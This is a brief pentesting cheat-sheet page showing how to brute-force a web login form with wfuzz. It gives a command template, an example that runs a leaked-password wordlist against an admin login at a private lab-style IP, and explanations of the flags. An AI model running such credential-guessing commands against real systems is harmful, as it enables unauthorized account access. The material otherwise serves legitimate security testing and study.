WFUZZ Brute Forcing

wfuzz -c --hw <word length> -w -d '<post data>' <url>

e.g.

wfuzz -c --hw 36 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

Key

-c

output with colors

-w

wordlist

-d

postdata

FUZZ

tells wfuzz where to fuzz with your wordlist

--hw <word length>

hide words of a certain length from the output

PreviousHydra Brute ForcingNextMySQL Interactive console

Last updated